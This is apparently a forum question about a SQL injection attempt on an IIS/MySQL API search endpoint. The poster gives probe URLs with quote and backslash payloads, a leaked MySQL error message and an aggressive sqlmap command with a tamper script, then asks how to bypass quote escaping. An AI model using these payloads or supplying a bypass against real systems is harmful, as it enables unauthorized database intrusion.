API Sql Injection
I need some help with an SQL injection at an API.
Webserver IIS 8.5
The GET request looks like this
...
https://example.com/api/Search?q=Landing
The Response looks like this
HTTP/1.1 200 OK
...
[{"pageId":1,"pageName":"Landing Page"}]
The SQL query where I tried to inject when I send a normal request looks like this:
... LIKE '%Lending%' ...
Now when I create a request like this
...
https://example.com/api/Search?q=Landing\'
The response looks like this:
HTTP/1.1 500 Internal Server Error
...
["exceptionMessage":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') OR (`Extent1`.`Name` LIKE '%Landing\\''%')) OR (`Extent1`.`TabContent` LIKE '%' at line 80",]
A response with error code 500 and it seems like their protection mechanism is duplicating the chars \ and '
Now when I fire up SQLmap, it is unable to perforn an injection
python .\sqlmap.py -r .\request.txt --threads=10 --random-agent --level=5 --risk=3 --dbms=mysql --banner --time-sec 10 --tamper=escapequotes --ignore-code=500 -v2 -p q
....
[INFO] heuristic (basic) test shows that GET parameter 'q' might be injectable (possible DBMS: 'MySQL')
....
[WARNING] GET parameter 'q' does not seem to be injectable
I use a tamper script because of ' (Slash escape single and double quotes (e.g. ' -> \'))
And a request like this
https://example.com/api/Search?q=Landing\\'
Returns this Response:
HTTP/1.1 200 OK
...
[]
Also
A request like this
https://example.com/api/Search?q=Landing\\''
Returns this Response:
HTTP/1.1 200 OK
...
[]
Also
A request with single quota returns zero.
https://example.com/api/Search?q=Landing'
Return this Response:
HTTP/1.1 200 OK
...
[]
How to bypass this protection and successfully perform an SQL injection?
